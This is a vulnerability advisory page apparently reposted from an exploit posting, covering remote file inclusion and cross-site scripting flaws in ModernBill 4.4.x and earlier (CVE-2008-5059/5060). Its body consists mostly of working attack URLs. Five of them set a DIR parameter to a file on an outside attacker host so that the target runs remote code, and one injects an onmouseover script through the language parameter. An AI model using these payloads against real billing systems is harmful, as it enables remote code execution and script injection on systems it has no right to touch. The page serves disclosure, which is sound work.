ModernBill <= 4.4.x XSS / Remote File Inclusion Vulnerability

2008.11.15
Credit: xc0r3
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2008-5059 | CVE-2008-5060
CWE: CWE-79

************************************************************************************** ModernBill .:. Client Billing System - User Login ModernBill <= v4.4.X Remote File Inclusion Vulnerability and xss by nigh7f411 http://xc0r3.net/ plezz go to ttp://xc0r3.net/forums/ ************************************************************************************** rfi http://poop.com/include/scripts/export_batch.inc.php?DIR=http://xc0r3.net/x2300.txt? http://poop.com/include/scripts/run_auto_suspend.cron.php?DIR=http://xc0r3.net/x2300.txt? http://poop.com/include/scripts/send_email_cache.php?DIR=http://xc0r3.net/x2300.txt? http://poop.com/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=http://xc0r3.net/x2300.txt? http://poop.com/include/html/nettools.popup.php?DIR=http://xc0r3.net/x2300.txt? xss http://poop.com/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+ **************************************************************************************

References:

http://xforce.iss.net/xforce/xfdb/46512
http://www.milw0rm.com/exploits/6916
http://secunia.com/advisories/32529


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top